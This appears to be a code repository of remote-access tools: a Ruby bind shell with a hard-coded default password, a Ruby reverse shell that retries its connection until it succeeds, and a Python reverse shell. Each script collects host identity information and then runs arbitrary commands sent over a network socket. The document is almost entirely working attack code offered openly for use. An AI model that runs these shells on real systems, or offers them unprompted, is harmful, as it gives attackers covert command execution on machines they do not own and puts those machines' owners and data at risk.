├── README.md ├── bind.rb ├── pi.py └── rubyrev.rb /README.md: -------------------------------------------------------------------------------- 1 | Ruby-Bind-and-Reverse-Shells 2 | ============================ 3 | 4 | Ruby Bind and Reverse Shells I wrote using standard libs. The Bind Shell includes authentication (a single shared password, default 'knock-knock', compared in cleartext against the first line a client sends) while the reverse shell does not; neither encrypts its traffic. Standard libs only, so it should work in most places you find Ruby supported. Hope it's helpful to someone..... 5 | -------------------------------------------------------------------------------- /bind.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # Ruby Bind Shell 3 | # By: Hood3dRob1n 4 | # 5 | # ./bind.rb PORT (PASS) 6 | # 7 | require 'socket' 8 | require 'open3' 9 | 10 | #Add some color without colorize gem since we sticking to std libs :) 11 | RS="\033[0m" # reset 12 | HC="\033[1m" # hicolor 13 | FRED="\033[31m" # foreground red 14 | FGRN="\033[32m" # foreground green 15 | FWHT="\033[37m" # foreground white 16 | 17 | def cls #A quick method to clear the whole terminal 18 | if RUBY_PLATFORM =~ /win32/ 19 | system('cls') 20 | else 21 | system('clear') 22 | end 23 | end 24 | 25 | def randz 26 | (0...1).map{ ('0'..'3').to_a[rand(4)] }.join 27 | end 28 | 29 | def help(message) #Exit strategy when shit goes sideways 30 | cls 31 | puts 32 | puts "#{message}" #print message passed when called 33 | #print example of usage sicne they obviously dont understand how this simple script works :p 34 | puts "#{HC}#{FGRN}EX#{FWHT}: #{$0} PORT #{FRED}(#{FWHT}PASS#{FRED})#{RS}" 35 | puts "#{HC}#{FGRN}\t=> #{FWHT}Default Pass is '#{FGRN}knock-knock#{FWHT}' if none is provided#{RS}" 36 | puts 37 | exit 666; 38 | end 39 | 40 | def bindshell 41 | #The number over loop is the port number the shell listens on. 
42 | Socket.tcp_server_loop("#{PORT}") do |socket, client_addrinfo| 43 | command = socket.gets.chomp 44 | if command.downcase == "#{PASS}" 45 | socket.puts "\n#{HC}#{FGRN}You've Been Authenticated#{FWHT}!#{RS}\n" 46 | socket.puts "#{HC}#{FGRN}This Bind connection brought to you by a little Ruby Magic#{FWHT} xD#{RS}\n" 47 | socket.puts "#{HC}#{FGRN}Type #{FWHT}EXIT#{FGRN} or #{FWHT}QUIT#{FGRN} to temporarily leave shell & keep port open listening#{FWHT}...#{RS}" 48 | socket.puts "#{HC}#{FGRN}Type #{FWHT}KILLZ#{FGRN} or #{FWHT}CLOSE#{FGRN} to close port & shell for good#{FWHT}!\n#{RS}" 49 | socket.puts "#{HC}#{FGRN}Server Info#{FWHT}:#{RS}" 50 | begin 51 | count=0 52 | if RUBY_PLATFORM =~ /win32/ #First we scrape some basic info based on platform type.... 53 | while count.to_i < 3 54 | if count.to_i == 0 55 | command="whoami" 56 | socket.print "#{HC}#{FGRN}ID#{FWHT}: #{RS}" 57 | elsif count.to_i == 1 58 | command="chdir" 59 | socket.print "#{HC}#{FGRN}PWD#{FWHT}: #{RS}" 60 | elsif count.to_i == 2 61 | command="echo Winblows" 62 | socket.print "#{HC}#{FGRN}BUILD#{FWHT}: #{RS}\n" 63 | end 64 | count += 1 65 | Open3.popen2e("#{command}") do | stdin, stdothers | 66 | IO.copy_stream(stdothers, socket) 67 | end 68 | end 69 | else 70 | while count.to_i < 3 71 | if count.to_i == 0 72 | command="id" 73 | socket.print "#{HC}#{FGRN}ID#{FWHT}: #{RS}" 74 | elsif count.to_i == 1 75 | command="pwd" 76 | socket.print "#{HC}#{FGRN}PWD#{FWHT}: #{RS}" 77 | elsif count.to_i == 2 78 | command="uname -a" 79 | socket.print "#{HC}#{FGRN}BUILD#{FWHT}: #{RS}\n" 80 | end 81 | count += 1 82 | Open3.popen2e("#{command}") do | stdin, stdothers | 83 | IO.copy_stream(stdothers, socket) 84 | end 85 | end 86 | end 87 | #Then we drop to sudo shell :) 88 | @work=Dir.pwd #var for keeping a working path so 'cd' works (for the most part) 89 | while(true) 90 | socket.print "\n#{HC}#{FWHT}(#{FGRN}GreenShell#{FWHT})#{FGRN}>#{RS}" 91 | command = socket.gets.chomp 92 | if command.downcase == 'exit' or 
command.downcase == 'quit' 93 | socket.puts "\n#{HC}#{FGRN}got r00t#{FWHT}?#{RS}\n\n" 94 | break #Exit when asked nicely :p 95 | end 96 | if command.downcase == 'killz' or command.downcase == 'close' 97 | socket.puts "\n#{HC}#{FGRN}got r00t#{FWHT}?#{RS}\n\n" 98 | exit #Exit when asked nicely :p 99 | end 100 | if command.downcase =~ /cd (.+)/i #our mini block to handle change directory requests 101 | Dir.chdir("#{$1}") do |dir| 102 | @work = Dir.pwd 103 | end 104 | end 105 | #Use open3 to execute commands as we read and write through socket connection 106 | Open3.popen2e("cd #{@work} && #{command}") do | stdin, stdothers | 107 | IO.copy_stream(stdothers, socket) 108 | end 109 | end 110 | rescue 111 | socket.write "#{HC}#{FRED}Command or file not found#{FWHT}!\n#{RS}" 112 | socket.write "#{HC}#{FRED}Type #{FWHT}EXIT#{FRED} or #{FWHT}QUIT#{FRED} to exit the shell#{FWHT}.\n#{RS}" 113 | socket.write "#{HC}#{FRED}Type #{FWHT}KILL#{FRED} or #{FWHT}CLOSE#{FRED} to kill the shell completely#{FWHT}.\n#{RS}" 114 | socket.write "\n\n" 115 | retry 116 | ensure 117 | @cleared=0 118 | socket.close 119 | end 120 | else 121 | num=randz 122 | socket.puts @greetz[num.to_i] 123 | end 124 | end 125 | end 126 | 127 | PORT = ARGV[0] || help("#{HC}#{FRED}Please re-run script with necessary options provided as argument(s)#{FWHT}!#{RS}") #confirm argument passed 128 | PASS = ARGV[1] || "knock-knock" ### THIS IS PASSWORD TO ENTER UPON CONNECTION, PASS as ARGUMENT AFTER PORT OR HARD-CODE IT HERE ### 129 | trap("SIGINT") {puts "\n\n#{HC}#{FRED}WARNING! 
CTRL+C Detected closing Socket Port#{FWHT}.....#{RS}"; exit 666;} 130 | @greetz=["#{HC}#{FGRN}Piss Off#{FWHT}!#{RS}", "#{HC}#{FGRN}Grumble, Grumble#{FWHT}......#{FGRN}?#{RS}", "#{HC}#{FGRN}Run along now, nothing to see here#{FWHT}.....#{RS}", "#{HC}#{FGRN}Who's There#{FWHT}?#{RS}"] 131 | bindshell 132 | -------------------------------------------------------------------------------- /pi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # A reverse shell in Python written by my friend Pi 3 | # Because i think its cool :p 4 | 5 | import os, socket, sys 6 | 7 | #Provide geenral usage statement fo rnewbies 8 | def usage(): 9 | print ''' 10 | +----------------------------+ 11 | | scriptname.py IP PORT | 12 | |--------e-x-a-m-p-l-e-------| 13 | | script.py 192.168.1.2 9999 | 14 | +----------------------------+''',exit() 15 | 16 | #Put down an interupt catcher 17 | def signalHandler(signal, frame): 18 | print("[!] CTRL+C received [!] shutting down now..."); 19 | sys.exit() 20 | 21 | 22 | if len(sys.argv) < 3:usage() 23 | 24 | #Establish our throw back using IP and PORT passed at run time 25 | s=socket.socket() 26 | s.connect((sys.argv[1],int(sys.argv[2]))) 27 | #Print pretty banner upon connect in 28 | 29 | s.send(''' 30 | __ 31 | ___ ___ _ _ ___ | | 32 | ___| | | |_ ___ _| | |_ _ _ ___| | 33 | | _| | | | | _|___| . 
| | | | | | |__| 34 | |_| |___|___|_| |___|___|_____|_|_|__| 35 | 36 | A Python Reverse Shell By: Pi 37 | 38 | 39 | Type "exit" to exit the shell\n[r00t-d0wn]cmd>''') 40 | 41 | while 1: 42 | data = s.recv(512) 43 | if data.lower()=="q": 44 | s.close() 45 | break; 46 | else: 47 | if data.startswith('exit'): 48 | s.close() 49 | break; 50 | else: 51 | result=os.popen(data).read() 52 | if (data.lower() != "q"): 53 | s.send(str(result)+"[r00t-d0wn]cmd>") 54 | else: 55 | s.send(str(result)) 56 | s.close() 57 | break; 58 | exit() 59 | -------------------------------------------------------------------------------- /rubyrev.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # Ruby Reverse Shell 3 | # By: Hood3dRob1n 4 | # 5 | # ./rubyrev.rb IP PORT 6 | # 7 | 8 | require 'socket' 9 | require 'open3' 10 | 11 | #Add some color without colorize gem since we sticking to std libs :) 12 | RS="\033[0m" # reset 13 | HC="\033[1m" # hicolor 14 | FRED="\033[31m" # foreground red 15 | FGRN="\033[32m" # foreground green 16 | FWHT="\033[37m" # foreground white 17 | 18 | trap("SIGINT") {puts "\n\n#{HC}#{FRED}WARNING! CTRL+C Detected closing Socket connection#{FWHT}.....#{RS}"; exit 666;} 19 | 20 | begin 21 | socket = TCPSocket.new "#{ARGV[0]}", "#{ARGV[1]}" #establish socket connection object using provided IP & PORT 22 | rescue 23 | #If we fail to connect, wait a few and try again or user cancles shit 24 | sleep 10 25 | retry 26 | end 27 | 28 | #Runs the commands you type and sends you back the stdout and stderr. 29 | #Shell Action... 30 | begin 31 | socket.puts "#{HC}#{FGRN}This Reverse connection brought to you by a little Ruby Magic#{FWHT} xD#{RS}\n\n" 32 | socket.puts "#{HC}#{FGRN}Server Info#{FWHT}:#{RS}" 33 | count=0 34 | #First we scrape some basic info.... 
35 | if RUBY_PLATFORM =~ /win32/ 36 | while count.to_i < 3 37 | if count.to_i == 0 38 | command="whoami" 39 | socket.print "#{HC}#{FGRN}ID#{FWHT}: #{RS}" 40 | elsif count.to_i == 1 41 | command="chdir" 42 | socket.print "#{HC}#{FGRN}PWD#{FWHT}: #{RS}" 43 | elsif count.to_i == 2 44 | command="echo Winblows" 45 | socket.print "#{HC}#{FGRN}BUILD#{FWHT}: #{RS}\n" 46 | end 47 | count += 1 48 | #Use open3 to execute commands as we read and write through socket connection 49 | Open3.popen2e("#{command}") do | stdin, stdothers | 50 | IO.copy_stream(stdothers, socket) 51 | end 52 | end 53 | else 54 | while count.to_i < 3 55 | if count.to_i == 0 56 | command="id" 57 | socket.print "#{HC}#{FGRN}ID#{FWHT}: #{RS}" 58 | elsif count.to_i == 1 59 | command="pwd" 60 | socket.print "#{HC}#{FGRN}PWD#{FWHT}: #{RS}" 61 | elsif count.to_i == 2 62 | command="uname -a" 63 | socket.print "#{HC}#{FGRN}BUILD#{FWHT}: #{RS}\n" 64 | end 65 | count += 1 66 | #Use open3 to execute commands as we read and write through socket connection 67 | Open3.popen2e("#{command}") do | stdin, stdothers | 68 | IO.copy_stream(stdothers, socket) 69 | end 70 | end 71 | end 72 | #Then we drop to sudo shell :) 73 | @work=Dir.pwd #var for keeping a working path so 'cd' works (for the most part) 74 | while(true) 75 | socket.print "\n#{HC}#{FWHT}(#{FGRN}GreenShell#{FWHT})#{FGRN}>#{RS}" 76 | command = socket.gets.chomp 77 | if command.downcase == 'exit' or command.downcase == 'quit' 78 | socket.puts "\n#{HC}#{FGRN}got r00t#{FWHT}?#{RS}\n\n" 79 | break #Exit when asked nicely :p 80 | end 81 | if command.downcase =~ /cd (.+)/i #our mini block to handle change directory requests 82 | Dir.chdir("#{$1}") do |dir| 83 | @work = Dir.pwd 84 | end 85 | end 86 | #Use open3 to execute commands as we read and write through socket connection 87 | Open3.popen2e("cd #{@work} && #{command}") do | stdin, stdothers | 88 | IO.copy_stream(stdothers, socket) 89 | end 90 | end 91 | rescue 92 | #If we fail for some reason, try again 93 | 
retry 94 | end 95 | #EOF 96 | --------------------------------------------------------------------------------